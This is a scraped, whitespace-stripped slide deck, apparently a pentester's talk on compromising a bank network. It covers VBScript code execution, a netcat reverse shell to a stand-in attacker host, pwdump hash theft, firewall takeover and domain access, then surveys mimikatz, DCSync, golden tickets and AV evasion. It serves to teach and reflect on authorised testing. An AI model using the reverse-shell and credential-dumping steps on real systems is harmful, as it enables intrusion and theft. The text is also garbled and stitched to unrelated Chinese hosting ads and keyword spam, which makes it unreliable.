Supportedpw

pw  时间:2021-02-19  阅读:()
PWNINGBANKSHOWTHEPLAYGROUNDEVOLVEDOVERTHEYEARSByMiikaTurkiaAUTHORMiikaTurkia0751155C83EB3327299EE49D66D0DFA2705BE5DCleadsecurityspecialist@nixuPentestersince'99PAST-PRESENT-FUTUREDISCLAIMER/CONFIDENTIALITYInprinciple,alltheassignmentsarehighlycondentialandcannotbediscussedinpublic(orinprivate)EvenincustomerorganizationonlyafewpeopleknowaboutthetestsorseethereportLuckilyIhaveoneassignmentfromyearsagothatIcandiscusstosomeextentENGAGEMENTAbankwantedpenetrationtestagainsttheirwholeenvironmentInitialtimeallocationwas2weeksThecustomerapparentlywantedtousethereportformarketingpurposesorconvincingtheircustomersAssignmentwasdeemed"completed"afterreportinginitialndingsRULEZTestingoccurredovertheInternetasblackboxtestingNouseraccountsNodocumentationNospeciallimitations,exceptnodisruptiontoservicesNomonetarytransactionsallowedTargetconsistedofaCclassnetworkNETWORKARCHITECTUREFollowingistheassumednetworkarchitecture{Internet}{Internalnetwork}---|FW|||/^^^^^\{DMZ}\__^__/RECONNAISSANCEShoot'emwithallIgotNoneedtostayundertheradarPortscanningQuickscantogetfastresultsThoroughscanonthebackgroundVulnerabilityscanningaftertheinitialportscanINITIALRESULTSThetargetlookedquitechallenging1HTTPSportopenEverythingseemstobeup-to-dateNohighormediumlevelvulnerabilitiesidentiedbyNessusWebapplicationprovidesbasicallyonlyaloginpageNovulnerabilitiesorindicationsofsuchidentiedininitialprobingMOSTPROMISINGNESSUSFINDINGGAININGCODEEXECUTIONLearningtouseMicroSoftFrontPageLearningtowritesomethingusableinVisualBasicScriptMakesuretheVBSisrunonserversideDimshellSetshell=WScript.
CreateObject("WScript.
Shell")shell.
Run""CHALLENGESWITHUPLOADEDBINARIESAttemptingtogaineasieraccessthanuploadingcustomVBSlesUploadnc.
exebinaryResultedinalewithsize0TrysomeotherbinariestoensureeverythingworksSomelesworkperfectlywhileothersendupwithzerosizeGETTINGSHELLDosometrivialmodicationstonc.
exetobypassAVsignaturechecksSuccessStartlistenerlocallytowaitforshellsessionRunthefollowingnetcatcommandusingtheVBScriptdescribedpreviously#iptables-IINPUT-ptcp--dport443-svictim-jACCEPT#nc-nv-l-p443nc.
exeattacker.
example.
org443-ecmd.
exePWDUMPFAMILYMultipleiterationsofsimilarlynamedtoolstodumptheWindowspasswordhashesTheymostlygrabbedthehashesfromSAMdatabase,decryptingthemwithSYSKEYwhenrequiredSupportedWindowsversionsrangefromWindowsNTtoVistaThesetoolshadtoberunontargetmachinewithAdministratorprivilegesSomeofthevariantssupportedobtainingpasswordsoverthenetworkGRABBINGCREDENTIALSDirectdumpofpasswordhashesfromtheSAMdatabasefailedasrunningwithlimitedprivilegesWindowstakesanautomaticcopyofe.
g.
theSAMdatabaseRunningpwdumpagainstthatsucceededgivingmeauserlistalongwiththeirpasswordhashesLANMANHASHEventhoughWindowswasusingNTLMv2hashes,italsostoredLanManhashesbydefaultUsedhashingalgorithmisextremelyfasttocrackMillionsoftestpersecondevenatthattimeLMhashsupports7+7charactersinpasswordsOnlyuppercaseletters,numbersandspecialcharactersEvenAdministratorpasswordwascrackedinnotimePOKINGAROUNDUnderstandingtheenvironmentiscriticalforfurtherattacksWithshellaccess,IwasabletostudythecompromisedhostanditssurroundingsOnlyaccesswithintheDMZ,InternalnetworkwastotallysealedoffLeveragingotherhostswithinDMZdidnotresultinanymorevisibilityoftheinternalnetwork"OLDSTYLEPIVOTING"UsingnetcattoscanafewcommonTCPportstoseeifIhadaccesselsewhereOntopoftheWindows(andHTTPS)protocols,oneIPofferedtelnetaccess,andturnedouttobeaCiscorouterTrivialwayslikedefaultcredentialsorSNMPleakingcongurationsorevenallowingmodicationsdidn'tyfor/l%iin(1,1,254)do(for%pin(21,22,23,25,135,139)donc-nvz127.
0.
0.
%i%p)2>&1|find"open"NETWORKARCHITECTUREUPDATED{Internet}{Internalnetwork}---|FW||/|\{Backend}{DMZ}{Router}LATERALMOVEMENTExcellenttoolcalledpsexecfromSysinternalsisusedtoruncommandsonremoteWindowshostsSupportspass-the-hashandpasswordauthenticationSambalesharestoaccessharddisksNetcatalsopossibleforTCPbasedclear-textservicesINTERNALNETWORKISSOFARAWAYAtthispoint,theDMZwasprettymuchowned,butthegoalwasstillunreachableIreallyneededabreakthroughtogainaccesstotheinternalnetworkGoingthroughthefewavailablehostsanddatawithin,IdiscoveredaterminallogthatseemedinterestingThelogcontainedalltheinputfromtheuserontopofservermessagesAdministrationpasswordfortheInternetrouterCATALYSTAmodularchassisthatcanaccommodatee.
g.
switch,routerandrewallmodulesThechassisranCatOSwhiletheinstalledmodulesranIOSACCESSINGTHEFIREWALLLoggingintotheroutermodulewithtelnetEnableadminfunctionalitywiththeleakedpasswordJumpintoCatOSandfromthereaccessthe"console"ofrewallmoduleCatOSallowsconsoleaccesstoanyinstalledmoduleNormallyadministratorslogdirectlyintotheCatOSinsteadofinstalledmodules,butinthiscasethedirectaccesstoCatOSwasblockedSamepasswordwasusedfortherewall,sonowIhadfullaccesstoitNEWRULETOMASTERTHEMALLAsalltrafcfromtheInternetandDMZtointernalnetworkwasblocked,IhadtochangethegameAddingnewrewallruleforafewchosenTCPportsfrommyIPwasneededWritetherulebutbeextremelycarefultolimitchangestoyourselfonly!
CommitthechangesandgainfastpathtointernalnetworkACCESSINGTHEDOMAINCONTROLLERAquicksweep/enumerationoftheinternalnetworkUseSMBNULLsessiontograbmoreinformationaboutWindowssystemsI.
e.
enumandwinfoRemotedesktopwasenabledontheInternalserverssotryingmyluckwiththecredentialsgrabbedfromDMZEasywinwiththeAdministratoraccountNETWORKARCHITECTUREUPDATEDInternet}|Router{Internalnetwork}---|FW|/\||Windows|+|VMS|+|\DMZ}{Backend}MIDAUDITCHECKPOINTFindingssofarwerecommunicatedtothecustomeronrstweek'sFriday.
(Informationaboutthegapingholeallowingtheinitialcompromisewasgivenimmediatelywhendiscovered.
)IwasplanningtostartpokingaroundtheinternalbankingapplicationsandVMSsystemsonMondayTheassignmentwasdeemedtobecompletedatthispointwhencustomerdigestedthendingssofarPASTVS.
PRESENT-BANKINGSECTORMorebanksareconcernedabouttheirsecurityScopetendstobemorefocused,possiblymissingholesintheadjacentserversorAPIsRedteamingLegislationandprivacyaspectsoftenforceustoignorethesocialengineeringandphishingaspectsofinitialfootholdDependsbetweencountriesTECHNICALMEASURESOTPisnotsolelyreliedonSMSvericationmobileappRiskbasedvalidationsFrauddetectionIsolationofdifferentservicesPVS.
P-OVERALLIngeneralsecurityhasimprovedquitemassivelyindifferentproductsandenvironmentsAfewtoolsremainprettymuchthesamenmapnessusManyoftheattackingtechniquesrelyondesignedfunctionalityandthusdifculttopreventWHYTOCRACKANDWHYNOTCrackingpasswordshasbecomelessnecessaryPass-the-hashPass-the-tokenButPWcrackingisstillusefulFasterthaneverRainbowtablesGPU,multi-core,cloudDetecting/exploitingpasswordreuseRDPandotherprotocolsWINDOWSAPISBasicallyusageofWindowsAPIsisthesameSomenewrestrictionsareputinplaceEvenmoreinterestingavenueshavebeendiscoveredToolsaresomewhatthesamebutbetteroneshavecomealongpsexecstillgoingstrongpwdumphasbeen"replaced"bymimikatzthatdoesthesamebutalsoalotmoreVBScripthasbeenoverrunbyPowerShellEASYORHARD"Hacking"hasbecomealoteasierwithgoodtoolstoautomateandsimplifytasksDefencesandprotectionmechanismsraisethebaralotExperiencesinincidentresponseandforensicsstillshowthesametricksbeingusedconstantlyinpresentdayMoststupidmistakesareexploitedHighlyadvancedattacksarealsobeingusedPVS.
P-DUMPINGPASSWORDHASHESToolsandtechniqueshaveevolvedquiteabitmimikatzGrabscleartextpasswords,hashesandkerberosticketsfrommemoryCanperformpass-the-hash,pass-the-ticket,buildgoldenticket,.
.
.
RuntoolsdirectlyfrommemorytoavoidAVdetectionPENETRATIONTESTINGFRAMEWORKSIntegratealotofreliableexploitsandfunctionalityPrettymuchallofthemsupportgrabbingpasswords(hashesandcleartext)OftenusingmimikatzNotonlycredentialsaregrabbedbutalsousedautomaticallyforlateralmovementGRABBINGTHEHASHESONWINDOWSDOMAINThereareafewwaystograbhasheswhenhavingenoughprivilegesonaWindowsDomainRequiredgroup:Administrators(includingDomainandEnterprise),orDomainControllercomputeraccountDCSyncisthemostnotablemethodcurrentlyAcomputerimpersonatesasadomaincontrollerandasksthevictimDCtoreplicateusercredentialsGOLDENTICKETGeneratearbitraryKerberosTGTticketsforanyuserofthetargetdomainCanbecreatedoff-lineKerberoslifetimepolicydoesnotaffectgoldenticketsCanbeusedwithpass-the-ticketmethodtoaccessanyresourceorimpersonateasanydomainuserPVS.
P-ANTI-VIRUSAntivirussoftwarehasevolvedfrompuresignaturebasedtouseheuristicsSandboxingisusedinanalysisandcontainmentAVcanstillbebypassedSlightmodicationsonbinariesTechniquestoescapesandboxhavebeendescribedovertheyearsLoadingmaliciousPowerShellfromnetworkandexecutingdirectlyinmemoryATT&CKAdversarialTactics,Techniques,andCommonKnowledge(ATT&CK)Goodinformationaboutthetecniquesandexampleswhenusede.
g.
byATPgroupshttps://attack.
mitre.
org/wiki/Main_PagePVS.
P-DETECTIONWindowsloggingstill(mostly)sucksbydefaultNopropervisibilityonwhat'shappeningonservers/workstationsDefaultlogretentionperiodsaretoosmallLogsarenotforwardedtoremotemachineLoganalysis/correlationislackingImportanteventsordetailsarenotloggedPlentyofirrelevantnoisetoclutterupthelogsandshortentheretention"period"(inMB)FUTURE

香港CN2云服务器 1核 2G 35元/月 妮妮云

妮妮云的来历妮妮云是 789 陈总 张总 三方共同投资建立的网站 本着“良心 便宜 稳定”的初衷 为小白用户避免被坑妮妮云的市场定位妮妮云主要代理市场稳定速度的云服务器产品,避免新手购买云服务器的时候众多商家不知道如何选择,妮妮云就帮你选择好了产品,无需承担购买风险,不用担心出现被跑路 被诈骗的情况。妮妮云的售后保证妮妮云退款 通过于合作商的友好协商,云服务器提供2天内全额退款到网站余额,超过2天...

VirtVPS抗投诉瑞士VPS上线10美元/月

专心做抗投诉服务器的VirtVPS上线瑞士机房,看中的就是瑞士对隐私的保护,有需要欧洲抗投诉VPS的朋友不要错过了。VirtVPS这次上新的瑞士服务器采用E-2276G处理器,Windows/Linux操作系统可选。VirtVPS成立于2018年,主营荷兰、芬兰、德国、英国机房的离岸虚拟主机托管、VPS、独立服务器、游戏服务器和外汇服务器业务。VirtVPS 提供世界上最全面的安全、完全受保护和私...

腾讯云轻量应用服务器关于多个实例套餐带宽

腾讯云轻量应用服务器又要免费升级配置了,之前已经免费升级过一次了(腾讯云轻量应用服务器套餐配置升级 轻量老用户专享免费升配!),这次在上次的基础上再次升级。也许这就是良心云吧,名不虚传。腾讯云怎么样?腾讯云好不好。腾讯云轻量应用服务器 Lighthouse 是一种易于使用和管理、适合承载轻量级业务负载的云服务器,能帮助个人和企业在云端快速构建网站、博客、电商、论坛等各类应用以及开发测试环境,并提供...

pw为你推荐
windows优化大师怎么用Windows优化大师怎么用?手游运营手册2019新个税主要内容有哪些?可以简单说明一下吗?博客外链求博客外链方法中国电信互联星空电信不明不白收了我200元互联星空信息费 求解万网核心代理我想买个域名和空间,我一朋友给我介绍万网代理环宇网络空间商,他们的空间稳定吗,价格怎么样,咨询师的服1433端口1433端口怎么打开今日热点怎么删除youku今日热点怎么卸载蘑菇街美丽说蘑菇街美丽说唯品会天猫京东。女生买衣服,哪个好神雕侠侣礼包大全神雕侠侣手游版四重大礼包怎么得到啊?网站营运网络运营主要做些什么?
查域名 com域名注册1元 vps是什么 vps优惠码 三级域名网站 韩国加速器 godaddy续费优惠码 win8.1企业版升级win10 秒杀预告 lol台服官网 流量计费 东莞服务器 免费网页申请 可外链的相册 中国联通宽带测试 深圳主机托管 石家庄服务器 winserver2008r2 pptpvpn 以下 更多